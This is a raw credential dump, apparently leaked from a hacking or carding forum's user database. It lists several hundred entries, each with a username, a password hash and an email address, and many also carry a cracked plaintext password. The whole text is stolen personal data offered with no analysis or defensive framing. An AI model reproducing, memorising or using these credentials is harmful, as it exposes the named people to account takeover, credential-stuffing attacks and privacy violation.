+hotpipi:97ac7f817fc617191aac26d27f00cd38::3837-854@online.de +Spencer:eb038d682ffc2d8d670cc09cc3fa2659c4121969:lederer:Spencer2k6@web.de +hexad.:a34c35848686ee303ecf54a2a6f2effb6bbeacb7:chago33:BRA1VED@web.de +soprano:5425328c7fe43ae369bb745540556380::rickyj1291@hotmail.com +igotemccz:8ec8537267973c490de2a02de9c9a3b1::igotemccz@yahoo.ca +gf0x:3a0021742109086faeaf0e3ad6a317bfa80cb3bd::creave@mail.ru +der_Dude:241eb85cfcf26b856d0c4739b246e64e::coolfighter1@gmail.com +Blackshark:a3d8da80f88c2205805b23c902acd196::midnight-records@hotmail.de +Agent.Bitch:1347c0be1c21f83b1b4056f6bab37f55643aafb7::agent.bitch@ymail.com +enigmar:cc214574eeef572dd5caf8a24f53b4f4::enigmar@bk.ru +Zone-X:25911c93e7d4739751b4fd4e4a487fed::bobi@web.de +RootIDS:8d108b977d5a51a46d3f74c8ada7f94d::blackproxy@hush.ai +addy1200:dad245444d679046861d18549f4b2d00::addy1200@trash-mail.com +lilplayer51:bdb86d5f7ebbef509ad4cf61fcc964fa7de95ac8:lalala123:bfg2007@hotmail.de +rio221982:acf57614146658f55d1aa909ec0a5a4fb9168c04::marshal_357@yahoo.com +Jokers:dfd20190aa43bccd2512685556c6220b::manusa8@live.com +Koreani:d372e934d57d9c124d4feab26b4e0f70::vellau.juaj@hotmail.com +PE4:000462c55dadca3449b66f46825f10c1::PE4@spambog.com +Rodriguez:39fdd6f34b07f6d108473e261cb659ea::rodriguez@secure-mail.biz +motogp:647f1b26a4d2c19fcb635b8e82f99f547a16bef5:serrano:adeurkota@gmail.com +leenux:5f4e6ea1223a0032b70ac0587a4df8f043398bc2:123456:tiauhai@gmail.com +xzibitit:e756903f1b9d8ab44d43a012db95abe5::elodia_brb@yahoo.com +R4z:e68f4a47aee8f69089f096598a19d074::lol@tmail.de +binglly:d72706e1c3c689abf9f9f88938435c57f147496f:iceice11:binglly@web.de +koleinz420:f7709c5c2c23822244e00c94a4722406fff96d0d:2323:koleinz420@hushmail.com +eiZo:ccbe60c74692910dc30575661e183c80::eizo.post@gmail.com +KillerDick:662e5ef3ec1d15e60b312c192074ca8e::bangbros77@gmx.net +ko-un:f758ec939e3e3444fe4e2d725e5bf9372f2fe5ae::ko-un@hush.ai +K34nu:8bf5c881e3eb684777b464f7945c7d5c30ae4193:seahawks:mr.jonny83@gmx.de +syntex:9ad03898b7145368b4d518ae01e2fd99::krammail@gmx.de +soccerpunter00:1581b96947005879a24251c90fc00470::soccerpunter00@yahoo.com +ZEL0S:1f80678625ca34d2ea8dfbf79ebc7ec0d222694b::milan661@web.de +Systek:a30bdc8681055027d85d991d52f2f0bec8894f8d:570903:x007xxxx@yahoo.de +webmoney:baad57cc4f903b491e33f00abfb218b27c882fd2::webmoney@mail.3dl.am +Arodus:eae16c86daf27e7c600af88fffa73e53::seba93@onlinehome.de +xBz:90f4511feb86fa7340ba341f71d26b1d::yang393@gmail.com +blaz!n:bfabde7bde43615ff34f661498a5914e::dj.dmi@web.de +N!ght:83774d3bd3ff2e08741bb59c04bf276b::lala@dummp.de +skylined101:7ce2c15aa45bebd76df8bff43e585f2db35373a9:albania:f_rami101@hotmail.com +AlphageneCL:61d3444c0f4a6a03d3b157f2cff85b74::selfemade@hush.com +Fa7alCash0ut:887950f724a620d9e395c5cd12396230::flo420@hushmail.com +c4shout:5d924b070594e8029316077c0ff9a7c1::c4shout@safe-mail.net +sempifer:cfa8412a8cfd1417c0fcf079625e4829::bbsupply123@gmail.com +cardme:f6aa07602e7db075abbfe103c25d147a::cardme@mail.com +weedneger:aedbb2f327740980e827e0fbe5886f03::weedneger@hotmail.de +oC-xRaY:bd807c6fe1da185b242c0ccc64244eb08fc8e15e::andy.gthc3@yahoo.de +DJTrux:3d308a9b8860a9cf359c68b105826d2a::dj_trux@secure-mail.biz +Olovo:b899d5c00166e5bcd79a99df74a2c48d::geezybeary@gmail.com +Creck:75b7fb37267b1f9a240aa0c4e30a3a570ba77d4e:hallo123:derdermitdem@gmx.de +x0x:a08791c14dca2c840c40bc0276d7da123e089d68::milowalk@yahoo.de +carder_carder:487aa6024cb6020fae779dbb11c3a32c::snd_1337@gmx.at +Agent-Schami:b9905c584c21b7fc8f20a2f40a062beb::jacks-ass-rocks@hotmail.de +archerkill30:041539169771d9ecdd0932ec189bf27e::alex_b_9_9@live.ca +murder:cf5bba5e426a9cb8c9e8989ca5575ae1::scr3am@live.de +PlatinumCardin:49af467bf66a891be279df736d8d6a4f::platinumcarding@gmail.com +kranich:d7ef126f2f7394ca305b2a0c575dd3c17b3eef98::1337just4fun@googlemail.com +Phamo:a3efb7f298db553b797b9ea067529b89dfc831bf::Phamo@mail.3dl.am +rich91:36771febec27b50583a322093c99b02c6df892fd::thegamor@web.de +557139009.in:93bc7f21f857faa79de9502ac35ca03e::mariomenno@mail.ru +Kettey:98d45c3be816d3ac229ce8c8f93762a6::tsqm@hushmail.com +Glain:123d0ac2ea8326e4d9fecdc31da05645::glain1337@gmail.com +njealde2005:3bbd795c9305b8fa85c6be97ce7f4c41f61176af::njealde2005@web.de +veto:4cd0c1a1de5e8c80eec1b6fa2a34ef49fef774e5:lamouna:bouboura@yahoo.fr +defqon:24d5d775367b1c0210899c5a76ed96f3::KarinKlappert@gmx.de +happy:05793b43983f191aebb824d3f7bf26642897036c::fick-die@kuh.mu +CaPeR:61d9f12ecd4dc297f060d8424cec42b0::caaaper@googlemail.com +master:eca1afe6b33cec8e1d54863d3eb211fb::pakus123@web.de +Metti:d004776c17c5b96c32b5ae2dfa60f52225c55bec:kcirtap00:patrickvajda@gmx.de +Rpstle:2666d0eefb4584383ddc1b317e729b04::rpstle@mail.ru +declined:cd2beb02d1ed7dcb96e59c0a2d60ae21::specialjeenyus1@yahoo.com +Orion:6295dd3c315c2c8b9d5b468d0a962bfd::orion.services@front.ru +henky:f081722c3a61b2deb3ebcec67d524bea::henky@live.de +Titelheld:9ce185dfe19b61ab1a6aa6d935d8b66ea9a1ad74:xxxxxx:blockbuster1@gmx.de +iShorty:abdf65cba70a0f6ed77779bc5aa598ef6255db53::mannimull@gmail.com +cR4zy:301996cf8100af3d1d9f37844973ef23fbbce4a3::mcpee1313@yahoo.de +Nextleet:3b5e9833fb500ba369a1ad5fcb90e6f8::pwnorpwned1337@hotmail.de +Alucart:0f3a5f05894fbd23293d648a3177ceae1820088d:evdhah1211:shuffle-hack@web.de +donvoto:92e74f6b6c9f2e21cb6a9a535f22e847::donvoto@hotmail.co.uk +Youzer:3582ab3bd3b04462e9a1346f16f2f411::tennismen3254@gmail.com +multisync76:35a99e04be74c16ef64719552c3341e2::freakysusu22@yahoo.de +RUUSGoldDrop:5d03523bd64dabea55daced71bf274c7::Cihan00web@web.de +nevez2000:91c0f47e12af373768f5e32cb03f72fa::nevez@gmx.de +lucifer1987:2924b8f2d31cb9ecd40984c6696d89b0::lucifer198742@yahoo.de +CodeM:37979a02afae9a7367e358e3e74ddf53::codem@hushmail.com +0wn4:c2dfd768b3129dd09ab63f18da7dc58741bec346:asdasd123:owna123@live.de +Natur3llx:57f0eb3a04db09af840d9aa2dec609ff::wurm@warez.tc +emr3:3b156aee666dd8d2a6c6f3ef60b5d1b1::support@justvalid.biz +logired:51546003a5790a4c8cc9aa1ef3df038dd661a107::logired@live.de +freak1:750dd381d4d8dbfb065e536e19586222::jegan.s@arcor.de +tryit:0f1be62d0497aa9ebbf818241ee3b27a382e1664:lalala:tryit@bspamfree.org +scuarplex:cac11209356149ecc4819a8b3675846f449caf13::scuarplex@gmail.com +maamoon:1ee22ca6a57d9122555da19f97755d91d1d0f06a:74107410:maamoon911@hotmail.com +dannyd:816feff2f3b749cabb91ada4b6057722::dannydehmel@web.de +crazzu:165971b7a09fc1e444488cfcc1491b697afb5697:siegheil:anabo1980@hush.ai +TWOx:51788e122aa328c7928af7da143b221d::king-twox@arcor.de +thedon:675e6305529d27122ceb7f9634c6e632::killahchila@yahoo.de +rolex:72a455b3e4bcf4523c001f4deaa35386::raik110@gmx.de +11111eins:acfd5c2e0d337c381afa8aebb7981b7138c2b567::whorainzone99@googlemail.com +NYX:9f99d08988671c71fe0c87e6ca15be25::knilrm00@mail.ru +Nexo:e9142f9d665484a537a204329686eaf4::nexo1337@web.de +hydr0gen:5292155a5362768c908b6b0536b6adaf::pardamen@aol.com +venox:609b9ec4c335761eb6658ebe8c91e382::boogie01@live.de +shorty23:6bad5f82bc58a2bc09d293fb5d27732a325f22ba:xo1158re:shorty@trash-mail.com +Foxdie:31614176a260cce35e49ea1920e8b7a7::leerinera06@gmail.com +DasRocka:1d80c6dd7f1ec66a8e88c064ced0bc5e::exploiterfan@yahoo.de +freak:ac974bcfc8e01297f442734ddda7da17::freak1337@hotmail.de +kest:97b5eec7f30435c3e728602038fe0100::nokia3334@web.de +Neocrow:41f1f944e7cffd4ddb7133ea333ed8ba65f3d2a3:13579frank:hwurst36@googlemail.com +ANNAiLOVEYOU!:d32c45ae8345ddf834ec69a08a01bdbb::carderz@web.de +laengst:11b79d94b9151f6942e88e9b9e9a9c650283348a:asdfgh:mr313383@yahoo.de +dazor:201b430d21e7dcb4e9b069fcdbfb37dd::ickedada@hotmail.de +Trigga92:e43c0aac8c198f5b3b4571fc3b566c17::trigga92@me.com +namic:d9ca75156aab05555e61d53bb78b94b776baa114::naminuk@live.com +Bernardo:4831991965cca5d5ce0b969f02d2d340::sven.ersing@gmx.de +masterboom:4902e58005d0fb5c6039ea90b492688e0c86c20e::tx56a@yahoo.de +Ehrlichkeit:37cfbcdf314e860dbbddb85402c28cffd20588aa:password:Pitbulll@hotmail.de +Peon:a85366bd4f97e7dc401315ffe08b03bb::peonhl@yahoo.de +vodka2:46a9a6d5305d9c512e228884a46b9911::vodka2@safe-mail.net +haigercrime:be7749eda41b87c15dd51dee4260db8a::lukas.steup@web.de +loOk:ab3d59261bd05ce549f21fed296e62d85473b144::fakearsch2@yahoo.de +pulseofminorit:745e9af0189b73afdf49301207f319b7dc772edf:metal:pulseofminority@gmail.com +tagtog:4824427a1a941868b98f28d8904bb333::tagyazid@hotmail.com +Ricardiazz:fd0d2905b77cf6ad1bbd58d7c3940d0f::maddiin@hotmail.de +sunsh1ne:240d8511e887da6c9ff450236decfec8::sunsh1ne@kuh.mu +make_money:b0b1f6b709051d4085219888728ae0eb::benelli.k2@web.de +Peiniger:88accde6ca5664518546b21ad63d1a1ef254587b::Dieter.Wuesten78@web.de +jenmara:57ccf18436ba77f8cf6359ea371f78b6::quick_money@live.com +ichunddu:02a0307ef58e4fbd276cc19500cf0562c2746704::keine70@gmx.de +infslash:b624aad92456e13ea4aad2a8b8fddda4::mojoa@hotmail.com +steelseries:5437b78dac070797f9894cddfc26756a::steelseries@hush.com +smokey7:db94a217cad217e58ce85ac465f5c1f2::smokey.seven@googlemail.com +sheloo:37dc8abf31c340f0730f1bf1eb989baa::badman99x@yahoo.com +StiX01:e79b42ef44e3db03a1d2d6cd1ef616ec::retrohax@gmx.de +Anaconda:a7fd66f9148fd9f942fa71256cd7e5c5::oettring@gmail.com +Toffel:2c7895f6edc7f99fa20518b97c5da01397471d59:bender1:the.root@web.de +L0stS0ul:7be949e0ccf1b60b1cdcb11f99b82bd5ccd82883::beule06@hotmail.de +St4n:c0e230afceb04cd261c9142136e3e1fc4c4c6fdc::th3.stan@gmail.com +p0rn0muff1n:4ae1b69043f86682bb95924b280dcb81e5033977:killer:Schorre6a@web.de +kolokoy:b6aa179911907424868b68c87b48d1923c9239af:abcdefg1:abracadabra1231@live.com +magichans:06f89b9366920a8bacf502b14b421f9765e3cbf6:fanta123:magichans@live.de +moepOmat:fcc3ab136c36cf6183dbbdc7022dbde4::moepomat@hotmail.de +e-mafia:3dd6243689d77407ad4859c4c95b224a::fired_my_boss@yahoo.com +bhk:00e874b0a0ad530c094afe2f1243e8272f3d93aa:analsex:bhk1337@mail.ru +The0ne:724d19eb995c6ee22b9308d0c298f658::djdemir@hotmail.de +DefenderBs:80bbbdc440fe5224307f60bc1db47da2d05dd4a6::DefenderBS@spambog.de +danarik:73d9422b85fea3c74c10fb625f529ba4f048c54f::danarik@web.de +Jigsaw4:991ae00813435ac66317da4e86b195c05e861b64::szabojozsy@yahoo.com +KingUnited:bd8c6399544edcdf41fde6073c8f3698::unitedking@hotmail.de +Sc4mz.com:e8fd21db2fd6aa364a7af33c550490b7::rx4m@hotmail.com +mastertut:169690d03bdc5a6cfec7633dacdbb5e6::kinkok@mail.ru +s4pPh!r3:f10724c78bbaf45787ec3b969dd4ff4059c15c96:edisn83n:sapphire00@web.de +roco:943b4f70d790eb6df8dd1967c30aa4cf::rocorocks70@yahoo.com +Apparatus:3c7fa398343ecbf7c5548857352033f1::apparatus.8@gmail.com +baltes14:5ba29be04dc8c956159856b7223ce074::a1960523@uggsrock.com +freakstb:ce81dd9f3dfb9b6e3ddd0e32c02b3e6fea263ac6::freakstb@yahoo.co.uk +olliech:9aaaf85dbdbd358068b91f6a8b99826e::olliebollie123@gmail.com +bloxx1337:1d3c3e7ffd62435c00de65747afe3cf3::bloxx1337@kuh.mu +heshop:0605e2aa5663c788ccdb48a84e7e3b1c::heshop@live.com +iltis:1c3ec8d1cae35e05c38a0832209379b9::iltis@hush.ai +Meth0d:578dab6ad11875cb835d33d9bf648f8d::nikolanicic@yahoo.com +Hacko1945:d5309d046d8154e5f8248ec83f2dd102::hacko1945@hotmail.de +djani:107305e8e228d045e60e842af17c044372f522ae:qaywsx:erdzani@hotmail.com +veter:0c9887fa2f838a1c08f49e33966247c2::rolanxyanide@gmail.com +DeadlyMaker:112de5a254ce9370de9a235c1d250397::rplawl@hotmail.com +retornable:828cf74a5c37647e07fd3b6cbb3eee59::alejandrovillareal19@gmail.com +Lenny:c6389352b6003612993ac3240734b555::dedwedewd@yahoo.de +FourOne:447fa95421550ec10ab2ffc6f0039553::h-reiswich@versanet.de +stimm:11451dfffb5837470b4d68369a58e7ae::shawty2oo8@live.de +Klempner:0e9d1763a708d8ead9e11cd19d5de2c8f666c136:pokemon2000:kurdin_frech@live.de +jayj:784dea53e84903b4e29b6af989c13e35::chinocorp@gmail.com +dragon14037:cdee3dc9b284fb06a6bb231f740c04a7::katz12345@web.de +Kleinstein22:4784dd9a48713f588d0ae8cc44b10cf4::Teksen-@hotmail.de +GreenEyes:2c0b49015826722b1e2e134f8d9ce430::scriptkiddyesl@gmx.de +lenemaus:4ac9b500b39f7a21126ea36b556acf2a2f91bc99::lenemaus90@hotmail.de +Bless:d4b0b3e2869322ad7a8994bdb730ced2::linxe@inbox.lt +thiziz2hard4u:70ed2483e2bb0836b2b3de5253e14c88::thisis2smart4u@yahoo.com +TUNNY:fb44f0957f9c694a38932b6e129ba402::webmaster@cardthis.biz +slkipo:e9a2fc38305db62a77d9f6921cec6320::scriptkidddyesl@gmx.de +L44va:391a0a312a2a6f34db6ccc63da98d015::kroemer@mail.ru +Biber:00c28a161f752400a6d9b8eccdfb98a3ee646e1c:master1:198325@mail.3dl.am +CtrlV:0da98fcce99da4f0426a890fc31a1fd0::paypal_paypal@mail.ru +DocMorris:fb36d373155353e71aea07f1c2ce16be7c485805:gehrmann:docmorris2k@web.de +stilo2000:01a81865c86e917278e889a987df6f8d8a07768e:123456:stilo2000@live.de +WerderBremen:ff07235282c1fee8c22acd83a7171535::dmusolf@web.de +St3ffl0r:3ecd239f029a6e555fd762476695eb4083748535::st3ffl0r@marsmail.de +Roger:94fd865df21e949f1e057263c3ebb910436c4ceb::wjpmtswjpmts@yahoo.com +TheBlackHat:cf920c7b66defecee0c5b2bebdcd0fcf08938f3b::trymolla@yahoo.de +marrs1:a2fcbf9d9e932e46bb912a0dc000f822de6779a5:26081989:marrs1@rambler.ru +sliver:8cb42cd8f9c3ed0d0f5c27426358887d7a89ce18:passwort12:sliver10@web.de +j0ker:630daabe8a48c471773788d5a867e1a201fb79cb::bond53@hotmail.co.uk +bruno00:3d21ef49304e7e92a59478ab410a0bc5::anti99go@yahoo.com +bitsedegitsek:4afe03e927497d8b71ace7dea2777e31::desertbektas@hotmail.com +saln:3c33913c84bddc3758d9edc31350645e::langner9@googlemail.com +thenoob:107fa5ee9903867f2448263f8f7a43bfee9f2fb8:klaus123:f.mueller92@gmail.com +tHeKs:d182b70f21fd2739fa2c0e0937283d2a::gibet_net@hotmail.de +Dogma:36f95b1b7f9e415044f84052beda2fa5e4e92db4:walktheline:lakspeort@gmx.ch +amok202:b2e0ffb49945e05c4588f92b1728b5ae::amok@techno.ms +Sergi:707aa6281b5fcb818da425eb296ad92daf12bdca::serggey_@hotmail.com +Mr.Verballert:e315a566dd8e6257094b285e322381e7f8b3fa6b::mr.verballert2k@gmail.com +synetic:e72c9100fbeff3956ad6e3e95c8d7de0143b4f03:gta22:synetic@secure-mail.biz +Smokealot:08f3a31a82edbc7cef0cde47f1795de8::Pr0uDx@gmail.com +youare:4746cf18121f65952b1ec354eaa75392::youare@twinmail.de +coco20:f43721d23d311becf1189be6da8f7ea6ecbb1f9a:google:annemarthe@hotmail.de +PS-Freak-Ger:2ee0523bc0ff9248f8305bb40fe8f20baf82267a::kalko1@oleco.net +WH!TE:4d6822c6cc3bd6b54b0186154efbe600fb41268e:gehkaken:a2107172@uggsrock.com +Lenni319:d3c12a4926f6b658d3f7d0735c67f558::lennart_1@hotmail.de +Nico74:25344893faafa22070ee19263e9f25a8::g0uve@web.de +Deagle:d53b826b821024401b39fe406018bc95::deagle@mail.3dl.am +gameboy:4a42af488d9c9983b7b2af919dfddcb1::fuckyou@trash-mail.com +bod:e0b1cfa40d090391e94333355a9fd290::bod.hegyi@yahoo.com +sroberty:89c66d68d3a1e1f11a1d3cbf7b64c6e9::sroberty@yahoo.com +hikmeterdem:1cce3613010346698ece7fb1132139fd::alikemalmeltem@yahoo.com +Loler123:0b9286c194c2956c7830f2867c1e3c16eeb148ab:m4s73r:ipod.max@gmx.de +al.mighty:918358bfebfd3c2f0821cc2a3f711b179c23e517:Aspire:lars.schiffer@gmx.net +wizard:d03e6a26fb596707df331ef4f0a810a6::admin@schnell-gewinnen-v2.de +TONYMONTANA~:221910a88696cad3fe8920e6d45c6581::inetlegende@web.de +Whopper:9f64862603bbe7634a05bec4f609b0d4::sky.sport.90@googlemail.com +SVW:d8067d6ed2b2044f2d69b8798e8a32d0::alexkeller72@web.de +-SweetyboY-:a5bce575aa87b3da72b4394609d9788b::kubi-is-da-best@hotmail.com +zones1:d6c13762dea3b956fa6df205d41ad990::fgt@aol.com +HoTdOg:48afe7fed1fc25b4158457c272139d85::hotdog@aol.com +G187:4d7167cba51fbf994bb1bc8df3f51b7eb8e3e65c::giorgo.giorgo@freenet.de +Killer:e879d4e1259a00e949da75a9c13d762ef1783e7b::xmen200611@gmx.de +jrevant122:45dab4099040bd604389b1c9cbf59f2b::jrevant@gmail.com +PeRl:20f4d7f5904c9693420c1c2238540edfa9d9e7a7:almdudler:Laut.Peter@gmx.de +falcon:87d9fc685e7318a5ecdf2a13822d02e6::a2161377@uggsrock.com +Ikarus:d6cba06067975bc9b893cc56feb40a3927b50946::MatrixGSG9@web.de +Clit licker:800b4760c8df5f9fe25ad53ae21c485c201fe4fb:egal0815:stougiat@30minutesmail.com +shoxx:ca72885590dc8fd6d503b5b1464e33ed::pp444pan@web.de +lanmp:cd6ccda9c0114651dc1114feb0e655f9::langner3@googlemail.com +Exar_Kun:991448e58d257ea05c43b3fe41c7549f::crew.cod@googlemail.com +Peanutbutter:4b9b32250ac3fa15b935db3593651670::rateenmail@web.de +0x01:0b94c6e19c9f06c2c7d66f7f5d351eb148a59fb9::unk-no@hushmail.com +amastar:a69513ff2e83ad3e5b2b7f00179bf9160fd7739b:philip123:babyloveme80@live.com +CLEKS:6f7343d03860da89a48f8d0d1c328fd6::hafen_rules@arcor.de +Spliffy:5c51226a787e2238ce614e6550e7ac5f::smuh12@12online.de +SN!PER:f926a60a6a573ec8d1dc78524084e5f1::andredennler@hotmail.com +NAPALM:db818e0f182a40d6be5893e797842bbef835016c::victory678@xemail.de +firepwnd:056ffeec8ff756bd7bec88eef472a3bc::fireworld@networld.at +Hannes:38d778ed85f1b40e97af256b7653ba18::hannekapfer@web.de +Associate:79225f1e095efb595672b69dcabb4f20::scenemail@gmx.de +zissel:674b8793287da115b4a14665072aa94a6df20e77::brain@xemail.de +SuperWalker:69de1858b78d49af5d6a040825fa8d78::clean78@hotmail.de +Senfi:a9c062b93491f45cf9e831133321098f2243b837::viva_la_bam_ch@hotmail.com +br0k.:b1c87fa9d6477045c5e01f97321e549b25754773::jaoklolf1nal@live.de +worldww3:6a66e5b511ae067c7f42b1744c3c40cba792e478::dhswe9emum@no-spam.ws +Wasted Youth:d7b6d3749208472d2f36e12e6969e905438cd250::dagmar_haedicke@gmx.de +asus:927fdb2d91ac14d9b72114745de47ef7::asus67@hotmail.de +2012:a2d2b004cfa4a24189bd035d32c1eaf5::buddhasagt@mail.ru +madtraxx:9123a491d96051bed4e541c7ff199710199b9fee:duisburg:madtraxx1@freenet.de +Kanje:7b4b953c6b6880bffc8c732185b8023a::thedarkness@live.de +Indeterminismu:25cace1bb1c446fd276ac437fe86f57c2ef97816:password:ehrlichkeit1111@live.de +trashy:c115b768454e0b24da5cbf5f85568db1e62b8484:123123:trashy@oleco.net +killahprogamer:1ae5fab19920cfdd1ad0bce5706c4304468aa0b7::killah.progamer@googlemail.com +5socks.net:8792c60c015eae279ccce0f1b8bcdad4:: +x220:72e72be445c11c7ce349a4acf25a45962d0b9f5a::noobzorx220@web.de +locoroco:c4b8d22943b66b03061b313ddc8de275::locoroco@web.de +superman123456:bf836d54da6c7d10a931ab1080e36a5998b03109::david2566@web.de +F1R4T:f9852abe71af5d9d35530d450f263b2a3bc5e04e::reiunsdaddssssaa@yahoo.de +Loptr:415dcd921be672c99f0ffbf6fa6b36c2c804ed37::loptr09@gmail.com +kikibold:698eb3d3367a24ebebcec7d3e1e78eb2::michi.sand@gmx.net +Johnzen84:dd4f9c0bef79d92d3f15347a60e8cbeac0562b48::peterlustig1987171@gmx.de +heisenberg:1d15083063e47ff4b7fb329c19b86970::heisenberg@trash-mail.com +pandemie:082606175b58f5fd5823c79994728ca265b9cf68::pandemie@discardmail.com +Squibs:d9c8414f91d3502a08e9e8da47c57639::squibs@cia.com +gorillaman:475c1b19519a684afb75b3c9d84fd433::gorillaman@lol.de +xXx_2:f0af451d04e6d0bacb914fadeec2a011::onhdedkqpdrfhl@bobmail.info +kikiboldd:39805d13b3af5a97ccb5f16f528a84d6::gfgdsgfdh@web.de +Kuh:9ad8915461027721b1e2b29a9ad6ffb791fa4e51:huhu1:epvp@gmx.net +Skim:34b7406a750d81050458c2bd6190f4d8::revengeofpblart77@yahoo.com +JamesRick:48d1ac0013be542533fd5c02fb58db06::668974@hush.com +Nekromis:79f02d1bb5565a7923e53d60659e691e::dennis.grothe@gmx.de +Ins4ne:b3f2f7f90cc9ed22fef1785786c9c501::spelli@gmx.net +Crack:b26383b0ba15be2e7a6b91a1eb5fca42::crackhat@just-gaming.eu +Cleriker:d717736bf33bd6665b7a4e4267657aae::kuerbisgorilla@web.de +skillor1337:8d79a9bad6ec510542f6013a6fa6eed2b448fc6f:hallo1992:skiller1337@hotmail.de +xoor:166a849ddd4d01ec529fdb140e44a094ce862334:123456r12:next12@hotmail.de +shrooms:372861ce2147edb8ad5086f8b6aa856f54e4b47b:metal:magic.mushroom33@googlemail.com +russians1:bf7e021656516e4aaaef2fe0911d62df::russians1@web.de +Fact0rX:8b11dccd7d728f63dfa6b7ef170f3c8e6a8b8551:Dominik12:c0py@live.de +Juizzz:96fc1691a6133aa6ff815ea0d7e7ae95::Juizzz@freenet.de +joeycrack:b321c9cff91ca2b109a8ae4ae50087bc::joey.crack@hotmail.de +devran:07aeec4df2fb4ee9ac7227b5150b16da69a48da8::make_y0u_m1ne@hotmail.de +ciwan:a59ad6aa25080e62c506b1afa745f16f4dc0753f:stylerking:ap-kurde-69@hotmail.de +Hackmanedi:f2da8aaf970046a7b810419a53cc0728::kosova_player_92_edison@hotmail.de +TrOvEjAr:47b0b3a12951311c5f73e5e6507ca727::copegus@hotmail.de +palganer:101efc94794f84b7c3642c017aa0966e::palga10@t-online.de +Black Angel:dbac8e78d52cc9991c14ad5f943abb21::georgiosm@hotmail.de +kunststofffrea:b5a86c0178b6dc11d82bb9c99c9ae3d4::handyseller@web.de +chrissss:1a7df1ca20d902025a1a4c4863364902019a4a29:noob1:paok_for-ever@hotmail.de +stedenon:6a1b4f8dab6bf949bd72545a9c3e1573::saft1@gmx.at +danielitt0:3502cc7654993955d75f5fe96f14a207e649f801::nolive@live.no +3oo1:8cdd50167353dc90a213ad5bcd8068a8a74aa574:itunes:ESLStaff@goodmails.de +Ayran:4a6934dd9e8731b263ecb006e1584b80d2ae29da:!crimeisking!:al.fred.hoff.mann@t-online.de +GrimE:3ce62ea86733e7249c3259989b0852f45e3dffa7::syberforce@gmx.net +xxplayboyxx:021b9d837d43fb7b538f50a1c3f19818a1c8db54::the_best_of_playa@hotmail.com +Kaiser911:df010c9e89ea5f056141d0005ca9d95f3a412d3d::TekkenPD@yahoo.de +xx:10288aacf35fafc3e3678ce2d5066c63::volk73@web.de +DrKrabbe:a9c54e720c28f6942a8c3363ea6c805140e1d579:axzjo200:geextah@freakmail.de +m3xXx:9840a3a86c3259b82a92e074b3b35e8b::themaxbot@gmail.com +Die Lupe:365ef7c3dbffa7456145afb7807463cf::DrZitrone@gmx.net +Crank088:f38e362c5df8fefbb74e6bba76c1b327::bloody015@gmx.de +BUDDY89:54a7d1d919a6f96d9baedcbaebe6d545cce8de5e:heilhitler88:spacko-mc@web.de +SUPERIOR:cf764fa5958ad5955f8dd76c23c25fc9d775975c::email236105@20minutemail.com +naic0n:584097ce1be7819c5ab619dc6b7baa22::admin@blessem.de +Bit3:51b56bd9f2ce50f15dce5c07ef71289246b59df2::raptor-pro@hotmail.de +laserman:328eb6e23e72fd19434bab9394f8310e3e323e83::Michelle.Trenteler@women-at-work.org +f4kt0r:53c0e97c3aa00f208eddb29d0e36279f::vareth@web.de +pwnedn00b:c5bfd0ad13ba547bb19199671beef53694c6c8f7:skateordie:marvin.noll96@gmx.de +mido:c10cbe6f046100da1ac53faf4a6a355e::mido@gmx-topmail.de +Delpan:10bcd45fdc7da99378790feaa3a2f2f2::apple1338@gmx.net +Emok:bccdbcf2a23c2fc5a347817c7a30727fcdd00154:hurensohn:emok2k@hosting4free.at +Sm0k3:4dd06aae1621ecad09ed0ec6246bcd06::dreesch63@yahoo.de +moritz100:41685ffe63a5074f6007bde5f29f7722b4b0531b:foerster:Moritzius12@web.de +Ice Cube:d3fa47730d932a0792d9d1bcbe1a83243342afaf:merlin123:deine_mutter1971@hotmail.de +bluetooth-Hack:757b1f905408cc57f18cac00af4a3132::bluetooth12345@gmx.net +Botox:ebb9050277ed37ee3085ce23a0219820::toni555555@hotmail.de +devil2982:7a8c45c2097be4bc7f16e42f7f9a8a38::boeserbruder23@aol.com +rainvair:d311a16391b95f7f0bb6ba187651f131::fakername@web.de +lace:8a3ccaf361b2be9abb9db6806ae23ee8::fumi5@hotmail.com +bjoerni:b9bf5a080940273cb3d53dead623c75ccf75cf03:logitech:bjoern@ixzess.de +random:64b7aede4f12f678f8707800f2f210ca8bc2b444:qwertz23:randommail@gmx.net +justaboi:8a17987ecd87cbaf6e2bd5d932363b90::young_art@hotmail.de +PallMall:4e389c7cd64102f476c6e46cbe3c2cbf144e4293:sonnyblack:al.giesen@googlemail.com +aw281087:b4950075c13bebc1609afc9aee5b2c8a13158b86:poser23:awbusiness@yahoo.de +peppi200:17a60b402bdc9bb1d9169384a3aacb7c::peppi200voigt@freenet.de +Testosteron:6b1e140a23d573a62de29b751b88e3f4::testo_@gmx.de +.net:f1a5912572cff37497f93677534e63de::h.markus_@live.de +DarkManX:d6b1437ddb1acdafd8ab66f93ce464a0dc1c03a2:alexander:darkmanx1989@hotmail.com +aikon:f0c828862a88601a71b69e0d0885a2c1::vollzeitjonny@live.de +phantom:e45fb873fbccf7bb14e2479c358089b9cf304850:homeland123:phantom0510@googlemail.com +trasher:8fd1cbf3665fdd6a2fdbd02b4a7e42e0::a2243998@uggsrock.com +RifleRound:ae005b293a8fafcee88b961413befc0d::rifleround@hotmail.com +Pintolus:5922b58c423c7d2a2e4f15de38ecd930::lac0ste@public-files.de +Fujitsu:f8b91a8dcf9a699c5f2b7c828188c1a7::coolnes2006@web.de +Tropy-Flow:3f63f80a372fce1331dba92d2725b5bb::krassermagier@hotmail.de +spLazer:a24f6d0d1f4b5c22ce82695396e01a63::Splazer@hotmail.de +albanner:9c824fec8077788e3b829ebd0d507c5f::al.banner2@hotmail.com +Metel666:994673fa100f3af0190b4320b89d3465a32eda9e::senex@hush.com +icelow:ac4f8d80f39ce85ac56791685dd759f3::juergenschlegel@hotmail.de +coolZER0:4a2551a56024650ebed76c6bb496cdfa::fanta.c0la@hotmail.de +NeotoX:e39356bfe548c6fb1b904031d32ae183::shadowstmc@web.de +gibson:51f2379944a2c86f08626b9f914a68fa::gibson@hush.ai +Deus2210:feac252e002340c7f7cd24ba89e68ede::sk2210@hotmail.de +LIRIX:3336d3a6e1aaaaad68040cfe17d2c6d25c3f7965::1337lirix@googlemail.com +funke1stern:ec04953540ae26d517e36615e6baf8a5::funke1stern@gmx.de +Nobody0:5519ce97c74a0a7969d5a61d526b36a5d10d0ee8::rwittgruber@yahoo.de +gaGo:cea6f2d71fb8c75e86f75e110a014140::test@test.de +Crusher_:19ffd83ba29054a9a73f08ac93670b34::zghzighh@trash-mail.com 